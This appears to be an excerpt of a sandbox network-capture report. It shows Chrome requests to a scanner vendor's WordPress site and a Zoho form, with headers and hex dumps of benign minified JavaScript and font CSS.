                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 3d 30 3b 6f 3c 73 2e 6b 65 79 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 28 27 5b 73 70 72 69 6e 74 66 5d 20 43 61 6e 6e 6f 74 20 61 63 63 65 73 73 20 70 72 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20
                                                                                                                                                                                              Data Ascii: =0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6e 67 28 31 36 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 58 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 69 2e 6a 73 6f 6e 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28
                                                                                                                                                                                              Data Ascii: ng(16);break;case"X":r=(parseInt(r,10)>>>0).toString(16).toUpperCase()}i.json.test(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 28 77 69 6e 64 6f 77 2e 73 70 72 69 6e 74 66 3d 61 2c 77 69 6e 64 6f 77 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78
                                                                                                                                                                                              Data Ascii: ypeof window&&(window.sprintf=a,window.vsprintf=o,void 0===(n=function(){return{sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};return t[n](a,a.exports,r),a.ex
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6e 3d 6e 2e 70 72 65 76 29 2e 6e 65 78 74 3d 6e 75 6c 6c 3a 69 2b 2b 2c 72 3d 73 2c 73 2e 76 61 6c 7d 72 65 74 75 72 6e 20 65 3d 65 7c 7c 7b 7d 2c 61 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21
                                                                                                                                                                                              Data Ascii: n=n.prev).next=null:i++,r=s,s.val}return e=e||{},a.clear=function(){r=null,n=null,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 69 66 28 6f 3d 74 5b 72 5d 2c 61 3d 70 5b 6f 5d 29 7b 66 6f 72 28 6e 3d 61 2e 6c 65 6e 67 74 68 2c 69 3d 41 72 72 61 79 28 6e 29 3b 6e 2d 2d 3b 29 69 5b 6e 5d 3d 6c 2e 70 6f 70 28 29 3b 74 72 79 7b 73 3d 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d
                                                                                                                                                                                              Data Ascii: if(o=t[r],a=p[o]){for(n=a.length,i=Array(n);n--;)i[n]=l.pop();try{s=a.apply(null,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d(t,e){var r;for(r in this.data=
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 20 30 2c 74 29 2c 6e 2e 64 63 6e 70 67 65 74 74 65 78 74 28 74 2c 65 2c 72 2c 69 2c 61 29 29 2c 75 3d 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 74 2c 70 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 69 3d 6c 28 6e 2c 65 2c 74 29 3b 72 65 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63
                                                                                                                                                                                              Data Ascii: 0,t),n.dcnpgettext(t,e,r,i,a)),u=(t="default")=>t,p=(t,e,n)=>{let i=l(n,e,t);return r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAc


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              43192.168.2.549769136.143.182.974431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC700OUTGET /formstatic/fonts?family=Open+Sans:400,700i,700,600i,600,400i,300i,300 HTTP/1.1
                                                                                                                                                                                              Host: forms.zohopublic.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcU
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:22 UTC383INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:22 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 1307
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_383aeadb58=09c5710d399dc09aa2aecb5e82cb2421; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1307INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 0a 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 73 72 63 3a 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 77 65 62 66 6f 6e 74 73 2e 7a 6f 68 6f 77 65 62 73 74 61 74 69 63 2e 63 6f 6d 2f 6f 70 65 6e 73 61 6e 73 2f 66 6f 6e 74 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 0a 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 0a 73 72 63 3a 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 77 65 62 66 6f 6e 74 73
                                                                                                                                                                                              Data Ascii: @font-face {font-family:"Open Sans";font-weight:400;font-style:normal;src:url("https://webfonts.zohowebstatic.com/opensans/font.woff") format("woff");}@font-face {font-family:"Open Sans";font-weight:700;font-style:italic;src:url("https://webfonts


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              44192.168.2.549771141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:22 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:22 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-c035"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6833
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa19b750cc4-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:22 UTC879INData Raw: 37 64 63 37 0d 0a 0a 0a 76 61 72 20 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 20 3d 20 7b 22 61 6a 61 78 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 64 38 35 65 33 66 32 63 65 22 2c 22 75 72 6c 73 22 3a 7b 22 61 73 73 65 74 73 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 5c 2f 61 73 73 65 74 73 5c 2f 22 2c 22 72 65 73 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 7d 2c 22 73 65 74 74 69 6e 67
                                                                                                                                                                                              Data Ascii: 7dc7var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ambir.com\/wp-admin\/admin-ajax.php","nonce":"fd85e3f2ce","urls":{"assets":"https:\/\/ambir.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/ambir.com\/wp-json\/"},"setting
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6b 65 74 22 2c 22 68 61 73 5f 63 6f 75 6e 74 65 72 22 3a 74 72 75 65 7d 2c 22 78 69 6e 67 22 3a 7b 22 74 69 74 6c 65 22 3a 22 58 49 4e 47 22 2c 22 68 61 73 5f 63 6f 75 6e 74 65 72 22 3a 74 72 75 65 7d 2c 22 77 68 61 74 73 61 70 70 22 3a 7b 22 74 69 74 6c 65 22 3a 22 57 68 61 74 73 41 70 70 22 7d 2c 22 65 6d 61 69 6c 22 3a 7b 22 74 69 74 6c 65 22 3a 22 45 6d 61 69 6c 22 7d 2c 22 70 72 69 6e 74 22 3a 7b 22 74 69 74 6c 65 22 3a 22 50 72 69 6e 74 22 7d 2c 22 78 2d 74 77 69 74 74 65 72 22 3a 7b 22 74 69 74 6c 65 22 3a 22 58 22 7d 2c 22 74 68 72 65 61 64 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 54 68 72 65 61 64 73 22 7d 7d 2c 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 22 3a 7b 22 6d 65 6e 75 5f 63 61 72 74 22 3a 7b 22 63 61 72 74 5f 70 61 67 65 5f 75 72 6c 22 3a 22 68
                                                                                                                                                                                              Data Ascii: ket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"woocommerce":{"menu_cart":{"cart_page_url":"h
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 68 61 6e 64 6c 65 72 73 22 2c 65 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 28 28 65 2c 74 29 3d 3e 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 65 77 20 74 7d 29 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 6c 69 6e 6b 41 63 74 69 6f 6e 73 3d 7b 61 64 64 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 75 74 69 6c 73 2e 75 72 6c 41 63 74 69 6f 6e 73 2e 61 64 64 41 63 74 69 6f 6e 28 2e 2e 2e 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 6f 6e 45 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 49 6e 69 74 28 29 7b 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 7d 69 6e 69 74 4f 6e 52 65 61 64 79 43 6f 6d 70 6f 6e 65 6e 74 73 28 29 7b 74 68 69 73 2e 75 74 69 6c 73 3d 7b 63 6f 6e 74 72
                                                                                                                                                                                              Data Ascii: handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActions={addAction:function(){elementorFrontend.utils.urlActions.addAction(...arguments)}}}onElementorFrontendInit(){this.initModules()}initOnReadyComponents(){this.utils={contr
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 75 48 65 69 67 68 74 43 73 73 56 61 72 4e 61 6d 65 2c 22 22 29 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 68 65 69 67 68 74 28 29 2d 65 7d 63 61 6c 63 75 6c 61 74 65 4d 65 6e 75 54 61 62 43 6f 6e 74 65 6e 74 48 65 69 67 68 74 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 68 65 69 67 68 74 28
                                                                                                                                                                                              Data Ascii: uHeightCssVarName,"");const e=this.widgetConfig.elements.$dropdownMenuContainer.offset().top-jQuery(window).scrollTop();return elementorFrontend.elements.$window.height()-e}calculateMenuTabContentHeight(e){return elementorFrontend.elements.$window.height(
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 2e 68 61 73 43 6c 61 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 63 6c 61 73 73 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 41 63 74 69 76 65 43 6c 61 73 73 29 7d 7d 7d 2c 32 32 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 70 3d 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 75 72 6c 73 2e 61 73 73 65 74 73 2b 22 6a 73 2f 22 7d 2c 34 34 30 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 63 6c 61 73 73 20 5f 64 65 66 61 75 6c 74 20 65 78 74 65 6e 64
                                                                                                                                                                                              Data Ascii: .hasClass(this.widgetConfig.classes.menuToggleActiveClass)}}},2258:(e,t,n)=>{"use strict";n.p=ElementorProFrontendConfig.urls.assets+"js/"},4409:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extend
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 29 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 26 26 28 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 3d 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2e 63 73 73 28 22 2d 2d 65 2d 74 72 61 6e 73 66 6f 72 6d 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 22 2c 22 22 29 7d 29 29 29 7d 69 6e 69 74 45 66 66 65 63 74 73 28 29 7b 74 68 69 73 2e
                                                                                                                                                                                              Data Ascii: .getElementSettings("motion_fx_motion_fx_scrolling")&&!this.isTransitionEventAdded&&(this.isTransitionEventAdded=!0,this.elements.$container.on("mouseenter",(()=>{this.elements.$container.css("--e-transform-transition-duration","")})))}initEffects(){this.
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 20 22 2b 65 29 7d 63 6f 6e 73 74 20 61 3d 7b 74 79 70 65 3a 6e 2c 69 6e 74 65 72 61 63 74 69 6f 6e 73 3a 73 2c 65 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 3a 74 2c 24 65 6c 65 6d 65 6e 74 3a 6f 2c 24 64 69 6d 65 6e 73 69 6f 6e 73 45 6c 65 6d 65 6e 74 3a 69 2c 72 65 66 72 65 73 68 44 69 6d 65 6e 73 69 6f 6e 73 3a 74 68 69 73 2e 69 73 45 64 69 74 2c 72 61 6e 67 65 3a 74 5b 65 2b 22 5f 72 61 6e 67 65 22 5d 2c 63 6c 61 73 73 65 73 3a 7b 65 6c 65 6d 65 6e 74 3a 22 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 65 6c 65 6d 65 6e 74 22 2c 70 61 72 65 6e 74 3a 22 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 70 61 72 65 6e 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 54 79 70 65 3a 22 65 6c 65 6d 65 6e 74 6f 72
                                                                                                                                                                                              Data Ascii: "+e)}const a={type:n,interactions:s,elementSettings:t,$element:o,$dimensionsElement:i,refreshDimensions:this.isEdit,range:t[e+"_range"],classes:{element:"elementor-motion-effects-element",parent:"elementor-motion-effects-parent",backgroundType:"elementor
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 69 73 2e 74 6f 67 67 6c 65 28 29 7d 6f 6e 45 6c 65 6d 65 6e 74 43 68 61 6e 67 65 28 65 29 7b 69 66 28 2f 6d 6f 74 69 6f 6e 5f 66 78 5f 28 28 73 63 72 6f 6c 6c 69 6e 67 29 7c 28 6d 6f 75 73 65 29 7c 28 64 65 76 69 63 65 73 29 29 24 2f 2e 74 65 73 74 28 65 29 29 72 65 74 75 72 6e 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 3d 3d 3d 65 26 26 74 68 69 73 2e 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 2c 76 6f 69 64 20 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6d 61 74 63 68 28 22 2e 2a 3f 28 6d 6f 74 69 6f 6e 5f 66 78 7c 5f 74 72 61 6e 73 66 6f 72 6d 29 22 29 3b 69 66 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 5b 30 5d 2e 6d 61 74 63 68 28 22 28 5f 74 72 61 6e
                                                                                                                                                                                              Data Ascii: is.toggle()}onElementChange(e){if(/motion_fx_((scrolling)|(mouse)|(devices))$/.test(e))return"motion_fx_motion_fx_scrolling"===e&&this.addCSSTransformEvents(),void this.toggle();const t=e.match(".*?(motion_fx|_transform)");if(t){const e=t[0].match("(_tran
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 74 29 2c 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 3a 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 31 30 30 2d 6e 2e 65 6e 64 2c 31 30 30 2d 65 29 2c 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 2c 73 7d 74 72 61 6e 73 6c 61 74 65 58 28 65 2c 74 29 7b 65 2e 61 78 69 73 3d 22 78 22 2c 65 2e 75 6e 69 74 3d 22 70 78 22 2c 74 68 69 73 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 58 22 2c 74 2c 65 29 7d 74 72 61 6e 73 6c 61 74 65 59 28 65 2c 74 29 7b 65 2e 61 78 69 73 3d 22 79 22 2c 65 2e 75 6e 69 74
                                                                                                                                                                                              Data Ascii: t),"in-out"===t&&(s=100-s)):"in-out"===t?s=0:"out-in"===t?s=100:(s=this.getMovePointFromPassedPercents(100-n.end,100-e),"in-out-in"===t&&(s=100-s)),s}translateX(e,t){e.axis="x",e.unit="px",this.transform("translateX",t,e)}translateY(e,t){e.axis="y",e.unit
